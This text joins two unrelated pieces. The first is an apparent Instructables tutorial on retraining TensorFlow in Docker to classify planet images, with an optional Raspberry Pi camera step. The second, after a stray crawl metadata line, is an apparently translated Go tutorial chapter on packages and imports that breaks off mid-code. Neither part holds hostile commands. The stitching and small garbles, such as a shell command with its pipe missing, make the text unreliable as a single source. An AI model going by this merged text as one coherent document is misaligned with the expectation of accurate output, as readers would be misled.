/SpaceImages/label_image.py /SpaceImages/test/IMAGENAME.jpg (You have to move the image into the SpaceImages folder) The output will be something like this: jupiter (score = 0.83155) venus (score = 0.05715) earth (score = 0.02341) mars (score = 0.02076) saturn (score = 0.01779)neptune (score = 0.01140)mercury (score = 0.00969)arcturus (score = 0.00748)uranus (score = 0.00463)iss (score = 0.00418)canopus (score = 0.00409)vega (score = 0.00338)sirius (score = 0.00238)alpha centauri (score = 0.00212)jupiter wins This will probably work good, but you can make it even better by adding more images to the folders inside the folder "Images". To retrain the software run the following command. python tensorflow/examples/image_retraining/retrain.py \<br>--bottleneck_dir=/SpaceImages/bottlenecks \ --how_many_training_steps 500 \ --model_dir=/SpaceImages/inception \ --output_graph=/SpaceImages/retrained_graph.pb \ --output_labels=/SpaceImages/retrained_labels.txt \ --image_dir /SpaceImages/images Run this command if you have all the time of the world (This will run 4000 steps): python tensorflow/examples/image_retraining/retrain.py \<br>--bottleneck_dir=/SpaceImages/bottlenecks \ --model_dir=/SpaceImages/inception \ --output_graph=/SpaceImages/retrained_graph.pb \ --output_labels=/SpaceImages/retrained_labels.txt \ --image_dir /SpaceImages/images You can speed up this process by opening VirtualBox. Select the default machine, click on default, open settings, select system and add more RAM to the process. You if you can't change the value, right-click the machine icon and select close via ACPI. Now you can change the value and start the virtual machine again. If you want to remove photos or folders, you will have to remove the bottlenecks in the folder /SpaceImages/bottlenecks too Step 6: Bonus Part With Raspberry Pi This part is optional and if you don't have a Raspberry Pi, or just don't want to use it, Please skip to step 10. Are you still reading? Good in this part we're gonna program our Raspberry Pi to take a picture if a button is pressed, send this picture to the Mac (you could probably use a linux computer too, but maybe you would have to edit the script a little.) and run the script to recognize it. This script will output the result in the ImageOutput.txt file in the text folder (or if it doesn't exist yet it will create it) Step 7: Setting Up the Raspberry Pi Alright, we'll first begin with the easy part: setting up the button. Just connect the button according to the image above (To ground and GPIO 18). Now we'll need to connect the camera to the Raspberry Pi, this can be tricky sometimes. Pull up the white part on the camera connector and push the ribbon cable in. Here's a nice video by the "Raspberry Pi Guy" in which he shows this process: (You may need to allow usage of the camera using the command: raspi-config. See also in the image above) Now download the script TelescopeCamera.py from the description to the Raspberry Pi and edit it to your own passwords and usernames (See in the image above) Step 8: Setup Your Mac (or Possibly Linux Computer) Download the file StartImageRecognition.txt and change the .txt extension to .sh (instructables doesn't accept .sh files). Save this file again to the home folder. Now open the file, you'll see that the PROCESSNUMBER part has to be replaced. To do this you'll need to run docker ps And insert the code that looks something like 81764e94e38f on the place of the text PROCESSNUMBER. If docker ps doesn't return anything run the following command: docker run -it -v $HOME/SpaceImages:/SpaceImages gcr.io/tensorflow/tensorflow:latest-devel Exit it and try again. You probably could use this script on a Linux computer, but you might have to edit the script a little bit. Look at the images for more clarification Step 9: Finishing It All Now run on the Raspberry Pi sudo python TelescopeCamera.py And click the button. You now should see an image appear in the folder /SpaceImages/test on the computer and a textfile with the result (see in the image abov). You could now mount your Raspberry Pi under a telescope and test it out, or you could take a more complicated way like in the image above (I haven't got a picture of it because I don't have a telescope myself). This finishes the bonus part. Step 10: Other Purposes I used the tensorflow software to recognize planets, but if you copy the script label_images.py, use the same as in this project and change all commands to your new folder name you could also use this software to recognize animals, plants or other objects. I even got face recognition working using this software! Step 11: Thank You for Reading My Instructable! If you liked my article, please vote for me in the Space contest. Also leave a comment if you have difficulties with executing this project or if you have feedback. Could you do this on microsoft devices? Hi, Tensorflow for Poets is sadly not natively supported by Windows. You could try this:... but I can't guarantee that it will work. You could also dual-boot linux on your device, here's a good tutorial for that: . Lastly you could install Linux in virtualbox, you can do that by downloading the .iso file from a linux distribution and installing it in virtualbox. Did this answer your question? Very interesting project. Thanks for sharing!
http://www.instructables.com/id/Intro-to-Machine-Learning-Recognize-Stars-and-Plan/
CC-MAIN-2018-05
refinedweb
1,540
66.13
Bart De Smet's on-line blog (0x2B | ~0x2B, that's the question) By now, most – if not all – readers of my blog will be familiar with this C# 3.0 and VB 9.0 feature called Local Variable Type Inference or Implicitly Typed Local Variables. The idea is simple: since the compiler knows (and hence can infer) type information for expressions, also referred to as rvals, there’s no need for the developer to say the type. In most cases it’s a convenience, for example: Dictionary<Customer, List<PhoneNumber>> phonebook = new Dictionary<Customer, List<PhoneNumber>>(); Dictionary<Customer, List<PhoneNumber>> phonebook = new Dictionary<Customer, List<PhoneNumber>>(); That’s literally saying the same thing twice: declare a variable of type mumble-mumble and assign it a new instance of type mumble-mumble. Wouldn’t it be nice just to say: var phonebook = new Dictionary<Customer, List<PhoneNumber>>(); var phonebook = new Dictionary<Customer, List<PhoneNumber>>(); while it still means exactly the same as the original fragment? That’s what this language feature allows us to do without loosing any of the strong typing. The reason it’s very convenient in the sample above is because of the introduction of arbitrary type construction capabilities due to generics in CLR 2.0. Before this invention, types couldn’t compose arbitrarily big and type names tend to be not too long-winded (namespaces help here too). As convenient as the case above can be, sometimes type inference is a requirement which is introduced by the invention of anonymous types. Typically those are used in projection clauses of LINQ queries although they can be used in separation as well. E.g.: var res = from p in Process.GetProcesses() select new { Name = p.ProcessName, Memory = p.WorkingSet64 }; var res = from p in Process.GetProcesses() select new { Name = p.ProcessName, Memory = p.WorkingSet64 }; This piece of code gives birth to an anonymous type with two properties Name and Memory (notice the type of those properties is inferred in a similar way from their assigned right-hand side) which is – as the name implies – a type with an unspeakable name. In reality the above produces something like: IEnumerable<AnonymousType1> res = from p in Process.GetProcesses() select new { Name = p.ProcessName, Memory = p.WorkingSet64 }; IEnumerable<AnonymousType1> res = from p in Process.GetProcesses() select new { Name = p.ProcessName, Memory = p.WorkingSet64 }; where the AnonymousType1 portion is unknown to the developer, so type inference comes to the rescue. Alright. But when is it appropriate to use the type inference feature? Here are some personal rules I tend to apply quite strictly: Also, it’s important to realize that mechanical changes to variable declarations (for fun?) can yield undesired behavior due to a change in semantics. A few cases pop to mind: static void Main(string[] args) { IBar b1 = new Bar(); b1.Foo(); var b2 = new Bar(); b2.Foo(); } interface IBar { void Foo(); } class Bar : IBar { public void Foo() { Console.WriteLine("Bar.Foo"); } void IBar.Foo() { Console.WriteLine("IBar.Foo"); } } static void Main(string[] args) { Foo f1 = new ExtendedFoo(); f1.Bar(); var f2 = new ExtendedFoo(); f2.Bar(); } class Foo { public virtual void Bar() { Console.WriteLine("Foo.Bar"); } } class ExtendedFoo : Foo { public new void Bar() { Console.WriteLine("ExtendedFoo.Bar"); } } In the end, as usual, there’s no silver bullet. However, one should optimize code for reading it (write-once, read-many philosophy). When trying to understand programs (at least imperative ones <g>) we already have to do quite some mental “step though” to absorb the implementation specifics with loops, conditions, class hierarchies, etc. We shouldn’t extend this process of mental debugging or reverse engineering with type inference overhead in cases where it’s not immediately apparent what the intended type is. Even though the IDE will tell you the type of an implicitly-typed local when hovering over it, it’s not the kind of thing we want to rely on to decipher every single piece of code. Similarly, IntelliSense is working great for implicitly typed local variables, but that only affects the write-once side of the story. After all, every powerful tool imposes a danger when misused. Type inference is no different in this respect. "Don’t use type inference in foreach" It's a matter of taste, but I would have to disagree - I don't find it a "DO NOT" rule, but rather a "CONSIDER". It all ends up with arguments pro and con readability and that's subjective most of the time. I, for one, do not like to specify a type name that will take up half the screen (for instance, a typed dataset's row type) in a foreach loop when I can avoid it. Also, LVTI is required in LINQ's let statements, so you have no choice there regarding the rules you mentioned. I usually default to casting the result of the let statement to the desired type to force LVTI to choose it. Pingback from Dew Drop - August 23, 2008 | Alvin Ashcraft's Morning Dew " when the right-hand side doesn’t clearly indicate the type:" Why? If you are using an anonymous type you don't care what class is returned. So why do you care when it isn't an anonymous type? Seems to me what really matters is how the object is bing used, its type is just book keeping. To put it another way, consider your example again: var something = someObject.WeirdMethod().AnotherProperty Why do you care what type "something" is but not care about the object returned by "WeirdMethod"? Hi Omer, I agree on the foreach case to be "debatable" from situation to situation. Carefully chosen variable names or method names (e.g. for iterators returning a sequence consumed by foreach) can definitely help, e.g. customers or GetCustomers(). For strongly typed datasets, the "table" referenced in the "in clause" typically reveals the type too. You're absolutely right about the let clause (not a "let statement" to be nitpicky) to be another case where type inference is a requirement. Coming from the framework development side of things, I'm more in the extremist camp opting for more verbosity to help with maintainability of large code bases, reading changelists from a few years back written by other people (or even from yourself after such a time). As Jeffrey Snover (PowerShell) says: "sometimes verbosity is your friend but sometimes it can be your enemy too". In the end it's as you say a matter of taste. Thanks, -Bart Hi Jonathan, I'm one of those folks coming from a left-to-right culture who likes to see the type; seeing "var" means to me that I'll be able to infer the type straight away when moving on. For anonymous types, the shape of the type will be indicated on the right-hand side (which is - to some extent - even more interesting for the reader as all of the properties are immediately indicated for further consumption in the local method scope, but that would need to be subject of a separate post on appropriate use of anonymous types). This being said, it's possible of course to make the anonymous type by itself cumbersome when assigning complex expressions to its properties (something that on the other hand might indicate "reckless" composition that will be hard to debug). Assume you're reading a chunk of code that calls out to some random API, calling a method WeirdMethod: var something = someObject.WeirdMethod().AnotherProperty; To come back to your question why I don't seem to care about the type of WeirdMethod() - I do. In general, I don't like this kind of chaining for non-fluent APIs. Required null-checks might be omitted (and no, Spec#'s verification guarantees wouldn't be a good excuse start writing this kind of code either IMO :-)), exception stack traces with line numbers might be confusing (where in the chain did it blow up) and more such horror stories concerning step-by-step debugging one method call at a time checking the return value after every step. In fact, the line above (assuming we know the type of someObject) already has var² complexity. The main problem I have with this is that the reader has little context to learn more about some API use to help in understanding or debugging (in the former case, reading code listings on a patio on a hot summer evening is typically a setting without tools; the latter case is typically a setting with tools). For some reason you want to learn more about AnotherProperty - if you'd have the type of the WeirdMethod() result available, you know where to look straight away. If not, you have to work your way back to a "known type" point and go from there. Also, just seeing the type name might set quite some context (e.g. OrderServiceProxy) that's very useful to absorb specific aspects of the code (wbe service calls, interop code, specific APIs with certain reputations, etc). Obviously, all of this depends from case to case and as usual the exception confirms the rule. I was actually going to write 'let expression' and have no idea why I wrote 'statement'. Still, clause is probably best :) Indeed, expression would be better, but clause is preferrable for the following reason. Expressions can be composed of other expressions and/or clauses where clauses can't stand by themselves while expressions can (for example: query expression > where clause > predicate expression). Pingback from WMOC#17 - PhotoSynth, Reflector move forward - Service Endpoint Pingback from Friday Links #14 | Blue Onion Software * Pingback from reverse phonebook Pingback from Appropriate Use of Type Inference or (2 var | ! 2 var) « Roman’s Blog With a hypothetical next release of the C# language around the corner (more about that after Anders, Pingback from Recent URLs tagged Assign - Urlrecorder
http://community.bartdesmet.net/blogs/bart/archive/2008/08/23/appropriate-use-of-local-variable-type-inference.aspx
crawl-002
refinedweb
1,639
61.26
49371/python-error-saying-nameerror-global-name-true-not-defined I'm trying to execute the following Python code: def monotonic(a): n = len(a) for i in range(n): if((a[i]<a[i+1]) or (a[i]>a[1+1])): return true a = [6, 5, 4, 3, 2] print(monotonic(a)) And I get the following error: NameError: global name 'true' is not defined There is a built-in function with the ...READ MORE you need to define the variable email READ MORE The right datatype for destination in argpasrse module ...READ MORE NameError: name 'xx' is not defined Python knows ...READ MORE You can also use the random library's ...READ MORE Syntax : list. count(value) Code: colors = ['red', 'green', ...READ MORE can you give an example using a ...READ MORE You can simply the built-in function in ...READ MORE You need to set up the path ...READ MORE cp27 means it's for python 2.7. Make ...READ MORE OR Already have an account? Sign in.
https://www.edureka.co/community/49371/python-error-saying-nameerror-global-name-true-not-defined
CC-MAIN-2021-10
refinedweb
171
75.4
I am participating in a cyber-sec course at the local uni. Our first project involves a web server that has a submission form and students scors reflected on it. You gain points by submitting the hash value of a secret word of a fellow student. For every point you gain, they lose a point. One of the aspects of the project is automation. I noticed that if I just refresh the submission confirmed page, it resubmits my points. So, I wrote a simple java program that just access this page as fast as it can. My question: Can any of you spot a way to make this faster? It seems it takes almost a second or two for each submission. Is the u.openStream(); waiting for a response? Is there a way to make it just submit, then ignore a response? Is this the most efficient way to be doing this? URL I am submitting is as follows: The code I have thus far is below. Basically, start twenty (or more) threads, and in each thread loop the openStream().Basically, start twenty (or more) threads, and in each thread loop the openStream().Code : import java.net.MalformedURLException; import java.net.URL; import java.net.URLConnection; import java.io.IOException; import java.io.BufferedInputStream; class XThread extends Thread { XThread() { } XThread(String threadName) { super(threadName); // Initialize thread. //System.out.println(this); start(); } public void run() { //Display info about this particular thread URL u; BufferedInputStream is = null; String myNAME = new String("me"); String vNAME = new String("andrew"); String vHASH = new String("4252943e53d9677d1ef12f4fad9e026b");//me // int wall=1; try { u = new URL(""+myNAME+"&Victim="+vNAME+"&VictimHash="+vHASH); for (int i = 0; i < 1000000; i++) { is = new BufferedInputStream(u.openStream()); System.out.println(i); is.close(); } } catch (MalformedURLException mue) { System.out.println("Ouch - a MalformedURLException happened."); mue.printStackTrace(); System.exit(1); } catch (IOException ioe) { System.out.println("Oops- an IOException happened."); ioe.printStackTrace(); System.exit(1); } finally { try { is.close(); } catch (IOException ioe) { // just going to ignore this one } } // end of 'finally' clause } } public class SingleUser { public static void main(String[] args) { Thread thread1 = new XThread(); Thread thread2 = new XThread(); Thread thread3 = new XThread(); Thread thread4 = new XThread(); Thread thread5 = new XThread(); Thread thread6 = new XThread(); Thread thread7 = new XThread(); Thread thread8 = new XThread(); Thread thread9 = new XThread(); Thread thread10 = new XThread(); Thread thread11 = new XThread(); Thread thread12 = new XThread(); Thread thread13 = new XThread(); Thread thread14 = new XThread(); Thread thread15 = new XThread(); Thread thread16 = new XThread(); Thread thread17 = new XThread(); Thread thread18 = new XThread(); Thread thread19 = new XThread(); Thread thread20 = new XThread(); //Start the threads thread1.start(); thread2.start(); thread3.start(); thread4.start(); thread5.start(); thread6.start(); thread7.start(); thread8.start(); thread9.start(); thread10.start(); thread11.start(); thread12.start(); thread13.start(); thread14.start(); thread15.start(); thread16.start(); thread17.start(); thread18.start(); thread19.start(); thread20.start(); }
http://www.javaprogrammingforums.com/%20java-networking/5161-need-more-speed-printingthethread.html
CC-MAIN-2015-40
refinedweb
470
57.47
Ah, that's what it means. I saw something similar to this somewhere in some documentation, but the object keyword threw me off. To me, 'object' indicates something more on the python side than on the c side. Also, even though you can do this to ensure the struct declaration ends up in the header file, I would still make the case that currently something is a bit off in that the header file tries to use something which it has no information about (and in the process actually ends up creating its own empty struct type). Thanks for all the help. -Seth On 06/07/2011 06:24 PM, Greg Ewing wrote: >> On Sat, Jun 4, 2011 at 10:36 AM, Seth Shannin >> <sshannin at stwing.upenn.edu> wrote: >> >>> test.h:11: warning: 'struct __pyx_obj_4test_foo' declared inside >>> parameter >>> list >>> test.h:11: warning: its scope is only this definition or declaration, >>> which >>> is probably not what you want > > Not sure about Cython, but the way to to this in Pyrex > is to declare the class 'public' as well, and then the > struct declaration for it will be put in the .h file. > > You will need to supply C names for the struct and type > object as well, e.g. > > cdef public class foo[type FooType, object FooObject]: > ... > > The generated test.h file then contains > > struct FooObject { > PyObject_HEAD > int a; > int b; > }; > > __PYX_EXTERN_C DL_IMPORT(void) bar(struct FooObject *); > __PYX_EXTERN_C DL_IMPORT(struct FooObject) *make_foo(int,int); >
https://mail.python.org/pipermail/cython-devel/2011-June/000891.html
CC-MAIN-2016-30
refinedweb
245
70.73
You're reading the documentation for a development version. For the latest released version, please have a look at Galactic. ROS2 on IBM Cloud Kubernetes [community-contributed] Table of Contents About This article describes how to get ROS2 running on IBM Cloud using Docker files. It first gives a brief overview of docker images and how they work locally and then explores IBM Cloud and how the user can deploy their containers on it. Afterwards, a short description of how the user can use their own custom packages for ROS2 from github on IBM Cloud is provided. A walkthrough of how to create a cluster and utilize Kubernetes on IBM Cloud is provided and finally the Docker image is deployed on the cluster. Originally published here and here. ROS2 on IBM Cloud In this tutorial, we show how you can easily integrate and run ROS2 on IBM Cloud with your custom packages. ROS2 is the new generation of ROS which gives more control over multi-robot formations. With the advancements of cloud computing, cloud robotics are becoming more important in today’s age. In this tutorial, we will go through a short introduction on running ROS2 on IBM Cloud. By the end of the tutorial, you will be able to create your own packages in ROS2 and deploy them to the cloud using docker files. The following instructions assume you’re using Linux and have been tested with Ubuntu 18.04 (Bionic Beaver). Step 1: Setting up your system Before we go into how the exact process works, lets first make sure all the required software is properly installed. We’ll point you towards the appropriate sources to set up your system and only highlight the details that pertain to our use-case. a) Docker files? Docker files are a form of containers that can run separate from your system, this way, you can set-up potentially hundreds of different projects without affecting one another. You can even set-up different versions of Linux on one machine, without the need for virtual machine. Docker files have an advantage of saving space and only utilizing your system resources when running. In addition, dockers are versatile and transferable. They contain all the required pre-requisites to run separately, meaning that you can easily use a docker file for a specific system or service without any cubersome steps! Excited yet? Let’s start off by installing docker to your system by following the following link. From the tutorial, you should have done some sanity checks to make sure docker is properly set-up. Just in case, however, let’s run the following command once again that uses the hello-world docker image: $ sudo docker run hello-world You should obtain the following output:: b) ROS2 Image ROS announced image containers for several ROS distributions in January 2019. More detailed instructions on the use of ROS2 docker images can be found here. Let’s skip through that and get to real-deal right away; creating a local ROS2 docker. We’ll create our own Dockerfile (instead of using a ready Image) since we’ll need this method for deployment on IBM Cloud. First, we create a new directory which will hold our Dockerfile and any other files we need later on and navigate to it. Using your favorite $EDITOR of choice, open a new file named Dockerfile (make sure the file naming is correct): $ mkdir ~/ros2_docker $ cd ~/ros2_docker $ $EDITOR Dockerfile Insert the following in the Dockerfile, and save it (also found here): FROM ros:foxy # install ros package RUN apt-get update && apt-get install -y \ ros-${ROS_DISTRO}-demo-nodes-cpp \ ros-${ROS_DISTRO}-demo-nodes-py && \ rm -rf /var/lib/apt/lists/* && mkdir /ros2_home WORKDIR /ros2_home # launch ros package CMD ["ros2", "launch", "demo_nodes_cpp", "talker_listener.launch.py"] FROM: creates a layer from the ros:foxy Docker image RUN: builds your container by installing vim into it and creating a directory called /ros2_home WORKDIR: informs the container where the working directory should be for it Of course, you are free to change the ROS distribution (foxy is used here) or change the directory name. The above docker file sets up ROS-foxy and installs the demo nodes for C++ and Python. Then it launches a file which runs a talker and a listener node. We will see it in action in just a few, but they act very similar to the publisher-subscriber example found in the ROS wiki Now, we are ready to build the docker image to run ROS2 in it (yes, it is THAT easy!). Note: if you have errors due to insufficient privileges or permission denied, try running the command with sudo privileges: $ docker build . # You will see a bunch of lines that execute the docker file instructions followed by: Successfully built 0dc6ce7cb487 0dc6ce7cb487 will most probably be different for you, so keep note of it and copy it somewhere for reference. You can always go back and check the docker images you have on your system using: $ sudo docker ps -as Now, run the docker file using: $ docker run -it 0dc6ce7cb487 [INFO] [launch]: All log files can be found below /root/.ros/log/2020-10-28-02-41-45-177546-0b5d9ed123be-1 [INFO] [launch]: Default logging verbosity is set to INFO [INFO] [talker-1]: process started with pid [28] [INFO] [listener-2]: process started with pid [30] [talker-1] [INFO] [1603852907.249886590] [talker]: Publishing: 'Hello World: 1' [listener-2] [INFO] [1603852907.250964490] [listener]: I heard: [Hello World: 1] [talker-1] [INFO] [1603852908.249786312] [talker]: Publishing: 'Hello World: 2' [listener-2] [INFO] [1603852908.250453386] [listener]: I heard: [Hello World: 2] [talker-1] [INFO] [1603852909.249882257] [talker]: Publishing: 'Hello World: 3' [listener-2] [INFO] [1603852909.250536089] [listener]: I heard: [Hello World: 3] [talker-1] [INFO] [1603852910.249845718] [talker]: Publishing: 'Hello World: 4' [listener-2] [INFO] [1603852910.250509355] [listener]: I heard: [Hello World: 4] [talker-1] [INFO] [1603852911.249506058] [talker]: Publishing: 'Hello World: 5' [listener-2] [INFO] [1603852911.250152324] [listener]: I heard: [Hello World: 5] [talker-1] [INFO] [1603852912.249556670] [talker]: Publishing: 'Hello World: 6' [listener-2] [INFO] [1603852912.250212678] [listener]: I heard: [Hello World: 6] If it works correctly, you should see something similar to what is shown above. As can be seen, there are two ROS nodes (a publisher and a subscriber) running and their output is provided to us through ROS INFO. Step 2: Running the image on IBM Cloud The following steps assume you have an IBM cloud account and have ibmcloud CLI installed. If not, please check this link out to get that done first. We also need to make sure that the CLI plug-in for the IBM Cloud Container Registry is installed by running the command $ ibmcloud plugin install container-registry Afterwards, login to your ibmcloud account through the terminal: $ ibmcloud login --sso From here, let’s create a container registry name-space. Make sure you use a unique name that is also descriptive as to what it is. Here, I used ros2nasr. $ ibmcloud cr namespace-add ros2nasr IBM cloud has a lot of shortcuts that would help us get our container onto the cloud right away. The command below builds the container and tags it with the name ros2foxy and the version of 1. Make sure you use the correct registry name you created and you are free to change the container name as you wish. The . at the end indicates that the Dockerfile is in the current directory (and it is important), if not, change it to point to the directory containing the Dockerfile. $ ibmcloud cr build --tag registry.bluemix.net/ros2nasr/ros2foxy:1 . You can now make sure that the container has been pushed to the registry you created by running the following command $ ibmcloud cr image-list Listing images... REPOSITORY TAG DIGEST NAMESPACE CREATED SIZE SECURITY STATUS us.icr.io/ros2nasr/ros2foxy 1 031be29301e6 ros2nasr 36 seconds ago 120 MB No Issues OK Next, it is important to log-in to your registry to run the docker image. Again, if you face a permission denied error, perform the command with sudo privileges. Afterwards, run your docker file as shown below. $:1 Where ros2nasr is the name of the registry you created and ros2foxy:1 is the tag of the docker container and the version as explained previously. You should now see your docker file running and providing similar output to that you saw when you ran it locally on your machine. Step 3: Using Custom ROS2 Packages So now we have the full pipeline working, from creating the Dockerfile, all the way to deploying it and seeing it work on IBM Cloud. But, what if we want to use a custom set of packages we (or someone else) created? Well that all has to do with how you set-up your Dockerfile. Lets use the example provided by ROS2 here. Create a new directory with a new Dockerfile (or overwrite the existing one) and add the following in it (or download the file here) ARG FROM_IMAGE=ros:foxy ARG OVERLAY_WS=/opt/ros/overlay_ws # multi-stage for caching FROM $FROM_IMAGE AS cacher # clone overlay source ARG OVERLAY_WS WORKDIR $OVERLAY_WS/src RUN echo "\ repositories: \n\ ros2/demos: \n\ type: git \n\ url: \n\ version: ${ROS_DISTRO} \n\ " > ../overlay.repos RUN vcs import ./ < ../overlay.repos # copy manifests for caching WORKDIR /opt RUN mkdir -p /tmp/opt && \ find ./ -name "package.xml" | \ xargs cp --parents -t /tmp/opt && \ find ./ -name "COLCON_IGNORE" | \ xargs cp --parents -t /tmp/opt || true # multi-stage for building FROM $FROM_IMAGE AS builder # overlay source COPY --from=cacher $OVERLAY_WS/src ./src ARG OVERLAY_MIXINS="release" RUN . /opt/ros/$ROS_DISTRO/setup.sh && \ colcon build \ --packages-select \ demo_nodes_cpp \ demo_nodes_py \ --mixin $OVERLAY_MIXINS # source entrypoint setup ENV OVERLAY_WS $OVERLAY_WS RUN sed --in-place --expression \ '$isource "$OVERLAY_WS/install/setup.bash"' \ /ros_entrypoint.sh # run launch file CMD ["ros2", "launch", "demo_nodes_cpp", "talker_listener.launch.py"] Going through the lines shown, we can see how we can add custom packages from github in 4 steps: Create an overlay with custom packages cloned from Github: ARG OVERLAY_WS WORKDIR $OVERLAY_WS/src RUN echo "\ repositories: \n\ ros2/demos: \n\ type: git \n\ url: \n\ version: ${ROS_DISTRO} \n\ " > ../overlay.repos RUN vcs import ./ < ../overlay.repos Install package dependencies using rosdep # the packages you need # build overlay source COPY --from=cacher $OVERLAY_WS/src ./src ARG OVERLAY_MIXINS="release" RUN . /opt/ros/$ROS_DISTRO/setup.sh && \ colcon build \ --packages-select \ demo_nodes_cpp \ demo_nodes_py \ --mixin $OVERLAY_MIXINS Running the launch file # run launch file CMD ["ros2", "launch", "demo_nodes_cpp", "talker_listener.launch.py"] Likewise, we can change the packages used, install their dependencies, and then run them. Back to IBM Cloud With this Dockerfile, we can follow the same steps we did before to deploy it on IBM Cloud. Since we already have our registry created, and we’re logged in to IBM Cloud, we directly build our new Dockerfile. Notice how I kept the tag the same but changed the version, this way I can update the docker image created previously. (You are free to create a completely new one if you want) $ ibmcloud cr build --tag registry.bluemix.net/ros2nasr/ros2foxy:2 . Then, make sure you are logged in to the registry and run the new docker image: $:2 You should see, again, the same output. However, this time we did it through custom packages from github, which allows us to utilize our personally created packages for ROS2 on IBM Cloud. Extra: Deleting Docker Images As you may find yourself in need of deleting a specific docker image(s) from IBM Cloud, this is how you should go about it! List all the images you have and find all the ones that share the IMAGE name corresponding to registry.ng.bluemix.net/ros2nasr/ros2foxy:2 (in my case). Then delete them using their NAMES $ docker rm your_docker_NAMES Delete the docker image from IBM Cloud using its IMAGE name $ docker rmi registry.ng.bluemix.net/ros2nasr/ros2foxy:2 Step 4: Kubernetes a) Creating the Cluster Create a cluster using the Console. The instructions are found here. The settings used are detailed below. These are merely suggestions and can be changed if you need to. However, make sure you understand the implications of your choices: Plan: Standard Orchestration Service: Kubernetes v1.18.10 Infrastructure: Classic Location: Resource group: Default Geography: North America (you are free to change this) Availability: Single zone (you are free to change this but make sure you understand the impact of your choices by checking the IBM Cloud documentation.) Worker Zone: Toronto 01 (choose the location that is physically closest to you) Worker Pool: Virtual - shared, Ubuntu 18 Memory: 16 GB Worker nodes per zone: 1 Master service endpoint: Both private & public endpoints Resource details (Totally flexible): Cluster name: mycluster-tor01-rosibm Tags: version:1 After you create your cluster, you will be redirected to a page which details how you can set up the CLI tools and access your cluster. Please follow these instructions (or check the instructions here)and wait for the progress bar to show that the worker nodes you created are ready by indicating Normal next to the cluster name. You can also reach this screen from the IBM Cloud Console inside the Kubernetes. b) Deploying your Docker Image Finally! Create a deployment configuration yaml file named ros2-deployment.yaml using your favorite $EDITOR and insert the following in it: apiVersion: apps/v1 kind: Deployment metadata: name: <deployment> spec: replicas: <number_of_replicas> selector: matchLabels: app: <app_name> template: metadata: labels: app: <app_name> spec: containers: - name: <app_name> image: <region>.icr.io/<namespace>/<image>:<tag> You should replace the tags shown between “<” “>” as described here. The file in my case would look something like this: apiVersion: apps/v1 kind: Deployment metadata: name: ros2-deployment spec: replicas: 1 selector: matchLabels: app: ros2-ibmcloud template: metadata: labels: app: ros2-ibmcloud spec: containers: - name: ros2-ibmcloud image: us.icr.io/ros2nasr/ros2foxy:2 Deploy the file using the following command $ kubectl apply -f ros2-deployment.yaml deployment.apps/ros2-deployment created Now your docker image is fully deployed on your cluster! Step 5: Using CLI for your Docker Image Navigate to your cluster through the IBM Cloud console Kubernetes. Click on Kubernetes dashboard on the top right corner of the page. You should now be able to see a full list of all the different parameters of your cluster as well as its CPU and Memory Usage. Navigate to Pods and click on your deployment. On the top right corner, click on Exec into pod Now you are inside your docker image! You can source your workspace (if needed) and run ROS2! For example: root@ros2-deployment-xxxxxxxx:/opt/ros/overlay_ws# . install/setup.sh root@ros2-deployment-xxxxxxxx:/opt/ros/overlay_ws# ros2 launch demo_nodes_cpp talker_listener.launch.py Final Remarks At this point, you are capable of creating your own docker image using ROS2 packages on github. It is also possible, with little changes to utilize local ROS2 packages as well. This could be the topic of another article. However, you are encouraged to check out the following Dockerfile which uses a local copy of the demos repository. Similarly, you can use your own local package.
http://docs.ros.org/en/rolling/Tutorials/Deploying-ROS-2-on-IBM-Cloud.html
CC-MAIN-2022-21
refinedweb
2,517
61.16
0 i have a folder that contains csv excel files that have numbers in the first column labeled 'x', second column label'y', and third column labeled'z'. i was trying to take all of the numbers in the x and calculate the averages and std, take all the numbers in the y column for all files and calculate the average and std...the same for the z column.this is what i have so far....but it doesn't seem to work import csv import os from numpy import array path="A:\\yoyo\\heyy\\folder" dirList=os.listdir(path) for file in dirList: fullpath=os.path.join(path,file) ## print fullpath with open(fullpath, 'rb') as f: nums=[[val for val in line.split(',')] for line in f.readlines()] ## print line anums = array([nums]) for c in range(anums.shape[1]): column = anums[:,c] col_mean=column.mean() col_std=column.std() print col_mean print col_std
https://www.daniweb.com/programming/software-development/threads/378860/csv-excel-files-calculating-the-avg-and-std-for-columns-python
CC-MAIN-2018-05
refinedweb
155
76.93
Chapter 10 packages and tools Now any small program may contain 10000 functions, but we can't build them one by one. Most of them come from others. These functions are reused in a way similar to packages and modules There are more than 100 go language packages. You can use go list std wc -l to view them in the terminal. Open source packages can be found at Org go comes with a toolkit with various gadgets to simplify workspace and package management 10.1 package introduction The package allows us to understand and update the code in a modular way. At the same time, the package can realize the encapsulation feature, so as not to make the code messy, but also facilitate our global distribution. The Go language package compiles quickly because it has three language features: 1 The imported package needs to be explicitly declared at the beginning of the file, so that the compiler does not need to read and analyze the whole source file to judge the dependency of the package. 2 The circular dependency of packages is prohibited. The relationship between packages is a directed acyclic graph. Each package can be compiled independently and may be compiled concurrently. 3 The target file of the compiled package not only records the export information of the package itself, but also records the dependencies of the package 10.2 import path Packages are usually imported automatically through import. For packages of non-standard libraries, the path address of the Internet should be written, such as the HTML parser maintained by the Go team and a popular MySQL driver maintained by a third party import ( "fmt" "math/rand" "encoding/json" "golang.org/x/net/html" "github.com/go-sql-driver/mysql" ) 10.3 package declaration Each Go source file must have a package declaration statement at the beginning, which is the identifier when imported by other packages Access package members by package name package main import ( "fmt" "math/rand" ) func main() { fmt.Println(rand.Int()) } Usually, the import path of a package is the package name, but they can have the same name, but their paths may be different There are three exceptions to using the package name as the last paragraph of the import path, 1 The path of the main package itself is irrelevant, 2 Test package, 3 Add version number information after the import path, such as "gopkg.in/yaml.v2" 10.4 import declaration Import can be used to import one by one, together, or in groups import ( "fmt" "html/template" "os" "golang.org/x/net/html" "golang.org/x/net/ipv4" ) If two packages have the same name and need to be renamed during import, this naming will only work in the current file import ( "crypto/rand" mrand "math/rand" // alternative name mrand avoids conflict ) Renaming has three advantages: one is to divide the time zone into duplicate name packages; the other is to simplify the complex package names and shorten the complex package names; the third is to avoid confusion with the duplicate name variables in the package The circular import compiler will prompt an error 10.5 anonymous import of packages If we import a package but do not use it, it will lead to compilation errors. However, sometimes we want to take advantage of the side effects of importing a package: it calculates the package level initialization expression and executes the init initialization function of the imported package. We need to suppress the unused import error. We can use it_ To rename the imported package_ Is a blank identifier and cannot be accessed import _ "image/png" This is called anonymous import of packages. It is usually used to implement a compile time mechanism, and then selectively import additional packages at the main program entry. Let's take a look at its features and how it works package main import ( "fmt" "image" "image/jpeg" "io" "os" ) func main() { if err := toJPEG(os.Stdin, os.Stdout); err != nil { 